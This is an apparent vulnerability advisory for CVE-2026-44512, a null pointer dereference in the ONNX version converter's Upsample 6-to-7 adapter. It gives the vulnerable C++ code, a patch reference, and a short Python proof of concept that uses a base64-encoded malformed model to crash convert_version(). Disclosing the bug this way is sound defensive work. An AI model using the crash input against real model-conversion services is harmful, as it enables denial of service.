PT-2026-56215 · Pypi · Onnx

Publicado

2026-07-07

·

Atualizado

2026-07-07

·

CVE-2026-44512

CVSS v3.1

5.5

Média

VetorAV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Summary

Null pointer dereference (SIGSEGV) in Upsample 6 7::adapt upsample 6 7() (onnx/version converter/adapters/upsample 6 7.h:31) when convert version() processes a model with an Upsample node that has zero inputs. The adapter accesses node->inputs()[0]->sizes() without checking input count. 107-byte PoC crashes on Release build.
This is the same class of bug as the Cast adapter advisory (separate report) but in a different adapter, different file, and different operator.

Details

The Upsample 6→7 adapter validates attributes but not inputs:
cpp
// upsample 6 7.h:20-33
void adapt upsample 6 7(..., Node* node) const {
  ONNX ASSERTM(
    node->hasAttribute(width scale symbol) && node->hasAttribute(height scale symbol),
    "...") // Attribute check PASSES

  auto width scale = node->f(width scale symbol);
  auto height scale = node->f(height scale symbol);

  auto input shape = node->inputs()[0]->sizes();
  //         ^^^^^^^^^^^^^^^^^^^^
  //         OOB when inputs().size() == 0 → SIGSEGV
}
The PoC has an Upsample node at opset 6 with the required width scale and height scale attributes but zero inputs. The attribute assertions pass, then node->inputs()[0] on an empty ArrayRef:
  • Release builds (NDEBUG): bounds-check assertion compiled out → reads garbage pointer → SIGSEGV
  • Debug builds: assert(Index < Length) at array ref.h:159 → SIGABRT
An Upsample node with zero inputs passes graphProtoToGraph() because the import code only resolves input names present in the protobuf.

PoC

python
import base64
import onnx
from onnx import version converter

poc b64 = "CAI6YQo8EgFZIghVcHNhbXBsZSoVCgt3aWR0aF9zY2FsZRUAAABAoAEBKhYKDGhlaWdodF9zY2FsZRUAAABAoAEBEgR0ZXN0YhsKAVkSFgoUCAESEAoCCAEKAggBCgIIBAoCCARCBAoAEAY="

model = onnx.load from string(base64.b64decode(poc b64))

# CRASHES — Upsample 6 7 adapter dereferences empty inputs array
version converter.convert version(model, 7) # SIGSEGV
107-byte PoC. Confirmed SIGSEGV on both onnx 1.21.0 (pip) and 1.22.0 (source build).

Impact

Any application that uses onnx.version converter.convert version() on untrusted models is vulnerable. This includes model conversion pipelines and tools that auto-upgrade opset versions for compatibility. The crash is unrecoverable (SIGSEGV).
This vulnerability is part of a systemic pattern across multiple version converter adapters. A full audit of all ~45 adapters was performed as part of the fix; eight adapters were found with the same class of unguarded indexed access (cast 9 8, softmax 12 13, softmax 13 12, upsample 6 7, upsample 9 10, group normalization 20 21, broadcast forward compatibility, upsample 9 8) and all have been fixed in PR #7813.

Correção

NULL Pointer Dereference

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

Enumeração de Fraquezas

Identificadores relacionados

CVE-2026-44512
GHSA-HWPQ-HMQ9-WJ77

Produtos afetados

Onnx